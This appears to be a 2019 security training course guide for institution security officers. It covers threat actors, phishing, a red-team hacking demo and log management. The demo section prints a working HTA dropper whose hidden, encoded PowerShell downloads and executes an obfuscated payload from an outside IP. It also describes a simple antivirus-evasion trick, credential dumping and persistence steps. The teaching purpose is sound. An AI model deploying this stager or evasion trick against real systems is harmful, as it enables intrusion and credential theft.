CEH Advanced ISO Course Guide (2019) PDF

10-D Academy Advanced ISO Course
Advanced ISO
10-D Security Training Academy
www.10dsecurity.com
10-D Security
Setting a Higher Level of Excellence in Information Security & Compliance Services
©2019 10-D, Inc. All Rights Reserved.
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
©2019 10-D, Inc. All Rights Reserved 1

But first…
• Logistics
• Introductions
• Schedule
• Other Questions or Topics to cover?
“I like a teacher who gives you something to take home to think about besides
homework.”
- Lily Tomlin as "Edith Ann"
10-D Security
2 ©2019 10-D, Inc. All Rights Reserved.
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

But first…
1. Name
2. Title/Role/Location
3. How long you’ve been in your current role
4. Some topic you hope is covered
5. Something else about you
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Course Agenda
1. Setting the Stage
2. Hacking Demo
3. Log Management
4. Baselining and Anomaly Detection
5. Incident Response
6. Dark Web
7. Business Continuity
8. Vendor Management
9. Politics
10. Wrap-Up
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 1: Setting the Stage

Topics:
• Review of Prerequisite Material
• Know your Enemy
• What makes you/us a Target?
• Attack Methods
• What would you see?
“We have met the enemy and he is us.”

- Walt Kelly
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Review
1. Role Description and Structure

2. Preventive Controls & Actions
(Policies, risk assessments, access control, patch mgmt., vendor mgmt.,
change mgmt., training)
3. Detective Controls & Actions
(Monitoring, SIEM)
4. Response Controls & Actions
(Incident Response, Investigations, BC/DR)
5. Testing, Reporting and Intel
6. Tools & Methods
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Know your Enemy
• Cyber-criminals
• Hacktivists
• Nation-states and militaries
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

What do They Want?

That depends:
• Cyber-criminals – Confidential Information/Identities
• Hacktivists – Attention/Retribution/Company Secrets
• Nation-states – Information/Access/Intellectual Property
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

“We don’t have anything anyone would want!”
Everyone is a target.
• Intended target
• Opportunity
• Resource
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Why Us?
• Visible – Your brand is well known to the public

• Scan found you – Automated scanning came across your IPs
• Opportunistic or Dumb Luck – Phishing, employee web
surfing, emails, social media, previous target, etc.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Attack Goals
• Installation of Malware
• Direct theft of information, such as passwords
• Direct monetary gain, such as ACH or Wire fraud
• Client Data (CC#, PII)
• Information to be used in future attacks (botnets)
• Denial of Service
• Parasitic – use of your resources
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Status Quo Security
• Compromise happens in seconds

• Data exfiltration happens in hours
• Often goes undetected for months
• Containment can take weeks
• Unsustainable model
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

How do you attack a fortress?
Have someone let you in…

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Attack Methods
• Network attack (remote)

• Social Engineering
– Phishing – Spear-phishing – Whaling
– Pretext calling
– On-premise methods:
• Pretexting (e.g., lost traveler, prospective customer, exterminator)
• Media drops
• Network attachment
• Information gathering
• Dumpster Diving
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

How many phishing emails does it take to get to

the Tootsie Roll center of your network?
• 22% of recipients open phishing emails at least once in a year
• 4% will click on an average phishing email
• A phishing campaign sent to 50 people will usually net 2-4
victims
• Time-to-first-click averages 16 minutes
Source: Verizon Enterprise, “2018 Data Breach Investigations Report”
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Not an “m” but an “r” and “n” together
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Two Questions
1. What is your institution doing to defend its information?
2. How would your institution know if the network were

breached?
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 2: Hacking Demo

Topics:
• Red Team – Blue Team
• Demo
• Following the Kill Chain
“He who does not prevent a crime when he can, encourages it.”
- Lucius Annaeus Seneca
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Cyber Attack Lifecycle
Reconnaissance Weaponization Delivery Initial Install & Expand Access Objective

•Social Networks •.doc •Email Exploitation Escalate (Command & •Steal data
•Phone calls •.exe •WWW •“Click” •Elevate Privileges Control) •System control
•Port scans •.ps1 •IM/chat •Attachment •Steal user •Recon network •DoS
•Shoulder surfing •.hta •USB/CD/DVD opened credentials •ID target data •Manipulate
•Wifi scans •.js •Social •Shell access •Move laterally systems/data
•Packet sniffer •.bat Engineering •Root kits •Establish •Launch
•.pdf Persistence subsequent
attacks
•.xls/.doc
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Stanford
East Wahoo, NJ
Boulder, Colorado
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Scott Lincoln
Check the time before and after – see how long this takes…
Real-time Video of breach
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Will Scott Click?

This attack example is using an
open source tool (Metasploit)
that Penetration Testers and Red
Teamers use to test networks.
 These examples show an

HTML Application (HTA) as the
delivery method, but could be
PS1, JAV, EXE, COM, BAT, etc.
Tip: Blocking all file types except

what is explicitly allowed will
give the network defender a
better chance of thwarting an
attack.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Payload

The source code of the HTA shows the attacker is using Windows’ PowerShell
platform:
<html><head><script>var c= 'powershell.exe -NoP -sta -NonI -W Hidden -Enc
WwBTAFkAcwB0AGUATQAuAE4ARQB0AC4AUwBFAFIAdgBpAEMAZQBQAE8ASQBuAHQATQBBAG4AYQBnAGUAcgBdADo
AOgBFAFgAUABlAGMAVAAxADAAMABDAE8ATgBUAGkAbgBVAEUAIAA9ACAAMAA7ACQAVwBDAD0ATgBFAFcALQBPAEIA
SgBlAEMAdAAgAFMAeQBTAFQARQBNAD4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AVAA7ACQAdQA9ACcATQBvAHoAa
QBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAV
AByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAk
AFcAYwAuAEgAZQBBAEQARQByAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkA
FcAYwAuAFAAUgBPAHgAeQAgAD0AIABbAFMAeQBzAHQARQBtAC4ATgBFAFQALgBXAGUAYgBSAEUAUQB1AGUAUwB0AF
0AOgA6AEQAZQBmAEEAVQBsAFQAVwBlAEIAUAByAG8AWAB5ADsAJABXAEMALgBQAFIATwB4AFkALgBDAFIARQBkAEUA
bgBUAGkAYQBsAHMAIAA9ACAAWwBTAHkAcwBUAGUATQAuEE4ARQBUAC4AQwByAEUAZABlAG4AdABJAGEATABDAGEA
QwBIAEUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAEQARQBuAFQAaQBhAEwAUwA7ACQAS
wA9ACcAZAA2AGUAMQBhAGIANQA5ADEAOAA0ADYAYgAwADkAMQAzADEAMgBkADYAZAA2AGEAMwBmADUAZQA2A
GMAMABjACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAYQBSAFsAXQBdACgAJABXA
EMALgBEAG8AVwBuAGwATwBBAGQAUwBUAHIASQBuAEcAKAAiAGgAdAB0AHAAOgAvAC8ANAA1AC4AMwAzAC4AMQA
wAC4ANwA6ADgAMAAvAGkAbgBkAGUAeAAuAGEAcwBwACIAKQApACkAfAAlAHsAJABfAC0AYgBYAE8AcgAkAGsAWwAkA
GkAKwArACUAJABrAC4ATABFAG4AZwB0AGgAXQB9ADsASQBFAFgAIAAoACQAYgAtAGoATwBpAG4AJwAnACkA'
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Payload
The source code of the HTA shows the attacker is using Windows’ PowerShell
platform (with Base-64 code converted to ASCII):
<html><head><script>var c= 'powershell.exe -NoP -sta -NonI -W Hidden -Enc

[SYsteM.NEt.SERviCePOIntMAnager]::EXPecT100CONTinUE = 0;$WC=NEW-OBJeCt
SySTEM>Net.WebClienT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like
Gecko';$Wc.HeADErs.ADD('User-Agent',$u);$Wc.PROxy =
[SystEm.NET.WebREQueSt]::DefAUlTWeBProXy;$WC.PROxY.CREdEnTials =
[SysTeM.NET.CrEdentIaLCaCHE]::DeFauLTNEtwOrkCreDEnTiaLS;$K='d6e1ab591846b091312d6d6a3f5e6c0c';$I
=0;[CHaR[]]$B=([chaR[]]($WC.DoWnlOAdSTrInG("http://45.33.10.7:80/index.asp")))|%{$_-
bXOr$k[$i++%$k.LEngth]};IEX ($b-jOin'')'
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Tricking AV
Simple changes to malicious code may fool AV. In this example, taking a
known Word macro and changing:
string = “first part of bad code” + “second part of bad code”
Run string
To…
string = “first part of bad code” & “second part of bad code”
Run string
…doesn’t change the code’s behavior, but it is enough to trick a common AV
system into not detecting.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – First Foothold

Once Scott clicks to launch the malicious code it is injected into memory,
without touching disk and likely avoiding an Antivirus scan. Once running, it
checks in with the attacker.
Attacker’s screen view below:
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Mimikatz tool

The attacker will load a memory scraping script to parse out the password
hashes and plaintext values. Mimikatz is a standalone memory scraping tool
that has been incorporated into nearly every attack platform used by
attackers and defenders alike.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

In this screen shot the attackers have executed mimikatz. See anything
noteworthy?
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

It is not unusual to find passwords of users who have previously used the
system. Unless the pagefile is cleared at shutdown the contents often survive
reboots.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – get_user
Using the information just found for the two user accounts, the attacker next
has the agent load a script (get_user) that is used to find out more about
users and their associated access, this example for user “pfrye”…
Results in…
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – get_domain_controller
Next, the attacker has the agent load a script (get_domain_controller) to find
out more about the target’s Active Directory environment.
Results in…
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Credential Guard
Introduced in Windows 10 Enterprise and Windows Server 2016, Windows

Defender Credential Guard uses virtualization-based security to isolate
secrets so that only privileged system software can access them.
Unauthorized access to these secrets can lead to credential theft attacks,
such as Pass-the-Hash or Pass-The-Ticket. Windows Defender Credential
Guard prevents these attacks by protecting NTLM password hashes, Kerberos
Ticket Granting Tickets, and credentials stored by applications as domain
credentials.
- Microsoft https://docs.microsoft.com/en-us/windows/security/identity-
protection/credential-guard/credential-guard
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Does Windows 10 / 2016 Fix It?
Anytime a vulnerability is fixed, attackers will look for different attack vectors.
Increasingly they look for options that allow them to “live off the land,” taking
advantage of existing applications or usage.
Nessus example
• Authenticated scans use Domain Administrator privileges
• Commonly setup with account that remains active indefinitely, with a password
that may not expire
• Usually able to access most if not all systems
• A compromised system may be tasked with waiting for a scan, to capture the
credentials used for the Authenticated scan
DEMO…
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Many institutions do not have a vulnerability scanner (e.g., Nessus), but that
does not entirely remove the risk. The same attack platform we just looked at
(“Responder”) can also respond to name resolution requests and pretend to
be the requested service (a “poisoning attack”). In this example:
• The user will attempt to access a fileshare that is unavailable (e.g., a typo or the
server is down)
• “Responder” will claim to be the requested service, and will ask for the user’s
authentication credentials (username & password hash)
• Like before, the attacker will have to crack the password hashes separately
DEMO…
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

What is the attacker taking advantage of for these attacks to work?

• User had to “let them in” to their computer (clicked…) for first foothold
• Weak passwords that could be compromised (cracked)
• Time… The attacker may have to be on the compromised system a while to
harvest the credentials
• Protocols/services in use that may not be needed*, including:
– NetBIOS (In particular, the NetBIOS Name Service (NBNS))
– LLMNR (Link-Local Multicast Name Resolution)
*For more info: https://10dsecurity.com/saying-goodbye-netbios/ and

http://woshub.com/how-to-disable-netbios-over-tcpip-and-llmnr-using-gpo/
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Attack Status
1. What information do the attackers now have?
2. What could they do with it?
3. What might trip up the attackers or impede their efforts?
4. If you were the attacker, what could you do to avoid detection or losing
your foothold into the target network?
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Red Team Persistence
The attacker has only one agent loaded, and could lose it at any time. They
will want to get a reliable on-going entry point.
Why might a Domain Controller make an attractive target?
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The attacker connects to the Domain Controller and obtains details:
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

The attacker sets up a persistence mechanism using the built-in Windows

Task Scheduler to launch a new agent every day at 9:00 a.m.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – Attack Recap
1. Attacker compromised a workstation

2. Attacker obtained user credentials, including a Domain Admin
3. Attacker obtained network information, including Domain Controller info
4. Attacker installed agent on Domain Controller and setup persistence
5. Network activity used only port 80 (http – common web access)
6. Initial “click” didn’t require Local Admin access, but it did hasten the
compromise
Total time to complete these tasks: Under 30 minutes

Total time to complete these tasks if Local Admin hadn’t been present: 2-4 hrs
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Hack Demo – How it Could End
January 19, 2019
Joe Customer
123 Any Street
Springfield, IL
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Kill Chain
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Section 3: Log Management

Topics:
• Requirements
• Log Inputs
• Issues to Consider
• Retention and Archival
• Log Management Solutions
• Log Settings
• Review, Correlation and Alerting
“Being able to see an activity log of where a kid has been going on the
Internet is a good thing.”
- Bill Gates
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Management
Definitions:
• Log: A log is a record of the events occurring within an organization’s
systems and networks. Logs are composed of log entries; each entry
contains information related to a specific event that has occurred within a
system or network.
• Log Management: Log management is essential to ensuring that
computer security records are stored in sufficient detail for an appropriate
period of time.
10-D Security
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________
_____________________________________________________________________________________

Log Management
Why Log?
• Investigate security incidents, policy violations, fraudulent activity, and
operational problems
• Auditing and forensic analysis, supporting internal investigations,
